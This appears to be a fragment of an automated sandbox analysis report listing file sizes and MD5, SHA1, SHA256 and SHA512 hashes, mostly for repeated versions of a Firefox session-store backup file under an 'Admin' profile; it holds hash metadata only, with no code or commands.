SHA256a6d3fa443e7c282a859b007fdb72fc8594f0e3838292da5e50892ff3556767a8
SHA512dab056087282ac78fcb4cc2f99e314a2dca76dc585e3e0b03d5e884b440c5bce8cd4b725a71f610921004d357c85e1e8bf8d041916209c65c041bbfca22a6f92
-
Filesize
7KB
MD52633396bbc611c8239e94873cbaae854
SHA1c91f331ec3104ba6df736b935941bd199b023299
SHA2564629fcd6166126a0bdd68b786f6a9856ae4d193efd5bb4b4c86bf66c07086f59
SHA5127884731860a5db9de5065d52b923a63199cc69b86cb1e807504d9aaddf390fe60b1f56dd6c1b9dd50f9fe367a49ee7ec0f44ee639bc43beaf48c1c4c3b3e6d8b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5c56762ab10dab98c4f6cecbdc6a79072
SHA1c7844ac1931a45dbde0c679e889feee421f07903
SHA256d447d0c909ecce2b71f6f5a413d76366c422ebc352634e51f98e0b7d3c674671
SHA5129a77c001feb01392196f647d1e53135aed4890a26951c13267be7c21f7eb85eed2d35f445b1cf1c178d0262dfe6babe376c93cc135fd3503e9eabef533dc40aa
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize3KB
MD5345e818435078ee5479a0a502c29dad8
SHA13a0809eaf1881b09702a1dde928f0d6dd82eef50
SHA256ea7d40960f735e432c02a3ef8c47f78fd4a2da31351439c5a4f4e53bf1aff767
SHA512718b5ab3c0f31e0e00df938cf618eb49ebb056ac8ac277eb1d36ef98d6d9c0c14f5e89f1b7fec65ee252d42493299b141ecfabb8fda53681670fa8e52d668073
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize8KB
MD577751977e71df865e2f9f4feae545b5f
SHA1b8c021126190b76d5fa69ec7a26afb6caf834ffc
SHA2564a1edd72ece1fe23b7478998ac9844f0d777b35dc715834291199376b79a906a
SHA5126e3615c5c505b10a17d6eb961edbcf87b5662509c910c289346f67a574147ef612277fdb7875d4f84e72ddea662d62375a647a8a4bb43856416a5ecdacdaeebb
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize8KB
MD59c46b8d3598395e8b19c62df00f29892
SHA17b0c803d9dbef43170994f35da2bc202a5dd4def
SHA2567d938294ab79f94423a8c7c5ea676dfe6b0ca43b3aa127819b9647519a7a4009
SHA5123bbca898cad8857676c8f8ee2e22f8ee304bc25f1c19c1fd6fce557fa64f7495309c931440d7cbe5c01abfee2924ea6d4fb3a818a18f2acd247291897074ee03
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize8KB
MD50c54521ea8c8f7160e7fc139e2b272fb
SHA19ebb287ad7397ffafded1690663a9ba08061cc67
SHA25693f480adda8d5e752d647b2a1d21403740ec5b42a50b762721e337da88b9fe2b
SHA512aaf6b3f11731543959354ea5da0834acb18609fb691b7e17871634ddb1377cec08895c56c980745d12f3357e49bba9bbab92967829a6d55db76f4e9562ad262c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize8KB
MD5413bddd6bedb95fa0670e0ee53fd6db7
SHA14d0c696b3966cc49177609d04c9680b5da97cd7a
SHA2565c721cbb7860a2a6233da18352782f3b92922eaf8b3549616494978cf2f0c0f7
SHA512be0dec6172e6a8043016dd5f7af82cb7b2a109c0b71916f0797d555176e2fb6497cfb8d602b2514e94e51a8e937c7de5145c21a1f519b249196b14b180c88287
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize8KB
MD5819d907954f6ff2eab0b8e8920879029
SHA1d30659e7bc67b3916645966c1a960b5a94716aab
SHA2566d0d6ec962631bd685dce887719537032b1bc62196578ae6215fb5057af165e8
SHA51290fda9ad5264ac4918a1782a0cf5457e3a455238020a9372780d1e65eaf9bcf1641ac0a50d45f9d98dbcd35ccf656b804efec9891cb6e7d84be99a21acacc46e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize8KB
MD59e570cd3e7033a6d931c05bf14801a37
SHA1ff707e1152718e628d837cefedd80b92fe801dfd
SHA25654a5c542be0f16df11e80c20653361768ad54cc2053173e4fd50c16a9fe64365
SHA512aadfdd2d1a3fd11e972cb597a37d817dcec8d73ad1b4b1493dfcd697d1f83821bbf8e615746568ac78a1693771422a055c8271b5c30a7dc1481bcc754705375a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize9KB
MD51127c3870425d94daa342ad8a5e18af0
SHA1d756319adf331ecad05f88da927d57592982f6c5
SHA25609c0601eea55a1ffd70f9a7bda65b0b5089764557da18d0e93e4b3076682225e
SHA512060e660986edad51065c1cd0ef5bd9542b77073da69eca94343c8b4be075c130780d8f89128973530704510973e838e77352c808e5f6b74c87a3448ec16bc5bd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize8KB
MD59884547b8c712b587d55f83a029b5a4f
SHA10ac067e78729f7475ffc125c7d4666007059411a
SHA2566698f7428e84892f385b016351c5f883418732583b0d96c31be7975d4b3807dd
SHA5120776a8d312dbe695eeaa642b0488d9b5c467235b7afdf958cd0d5df0967c60fc23c130644eee8609409a52076cc246f8fc9f2c4449df36e7d852dc0e8d1e0eae
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize8KB
MD5e6eee3cc238b47f582b33fddd6af8f10
SHA1e5655a4dbcbe0f7924dbbf23303c95a4703ae74e
SHA256b0876709e509843e39cc90cfd4773ba86ecc134fb0c723920678e3379b8b3bef
SHA5126fac5a2299b85a22d7ac79d9c3334a36a364afaf85c89a09cd2b04dd1b365a79b04a358efb8d3bb64b9b4f7c85673f78084494b4ee5ef843e6871e717edeed98
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize8KB
MD5b0b370edf16347b035a6a60a21e36825
SHA169ae37836b69dd2ca0966ce576020287ef41d7ea
SHA256434083a39edca05b5bee2fc42f6d50c0b750dd6dcc02246682f35278c433da24
SHA512b56911badcce82476929b9bb2fc672fc28b15ff2d66c6ede0332a7026fd84f9ee104363dc7829876bc01b208cb4c1ea0eedf560c61930c775eb0723795bbe1f3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize8KB
MD52a740b4462a19687cf9234857ba8979f
SHA158f9aa74f64fba674cfef357d216e380ccd6f215
SHA2568d99cb4803262ac5cb2767dfd74237d24a16ade108ec5b654dc8ee0e71db472c
SHA5122657d2613de62270d4b3eb5d1d87b185d9ee58ac52e03c485e0d3f443aad505f0cc1f81e06789c3e4c5c9ae3340e4958acf25f6e68c9876983c6c9fcddb9b695
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize8KB
MD5be3c55cfffe9686e146bac7d84830579
SHA12d4cd16a44b5ee37f247e9a745a576d525e72102
SHA2562e41a67be0b3412ea878bb1cde440d4a0857586aed1e25a404004733ca47284f
SHA51256f9a90d9f0e4d30777ae0c847ba752b9ffa0f6c89ef8ccdeaea441bf1958471212aa9975991aa561d8e9c0ae59ab126ebbd0282fa462a45cd59110177e83322
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\sessionstore-backups\recovery.jsonlz4
Filesize8KB
MD5981bb03457ac1f3e49681f0a971fc15a
SHA17f3b2e9ba9dc7e09052ad5938372bc353e0db4ba
SHA2561995cdb23ba99c5fd6e3cb2ce336450207f76a139ce3fc384ca7a4a740f7dcf5
SHA51273c9e549b8fee063dcab681c04afd7babb24704739191a4955c01f0ef7a1d1714a57d8f6ac5aa992a0b6db9538ea71ca7393e64a0b9f462820de1c7dbdc773e1
-
Filesize
1023KB
MD5981931159e45242cc1c3dcbdb47846d7
SHA1875bd5c00a30df19216e7f08bc18d97490ed25a6
SHA25669461917822ca791194992d7b7d01e12afbf0eb86ae327b3fb86df01012e060e
SHA512ffad32e77bcd989a20e1226021280204ded3e4ba7987e02978859be966e454785a0c0e196397378ad47d57f251764aeade3836127fe94ef67800342591fc63ce
-
Filesize
11KB
MD5d406adfeff7a8331b211a9bfa3efc577
SHA1367c96a3ff92717ba3003b7e13a99108c79ce8ea
SHA2568756f100d4008296f2b8b70e55773964112870096e566eff56438ac088149585
SHA512b1733afb57930f7eae915ce2076f500ad09a6c76e4b9262909568629b1c96c2b2b7e948b060a35e01b8813bfb85bbf604bbfdd64b7c06357f94169c9d6505cd2
-
Filesize
93KB
MD5019c5fb7c4771808dc65e1096c771348
SHA144a33096a0498722bc286c5f190d37b070db2d23
SHA256c8963b6bd2ca8497603794bf9adcbff7a3ea55c9c3edef3d5a992405ee256a90
SHA51210421eafb6ca5f609e95495cb05f82414890d82284838ce342c4d4fb6b656949890ccf84a70ef49b7c8ad166b55d67457e5757e14ee7afc6ceef86f29bc9c597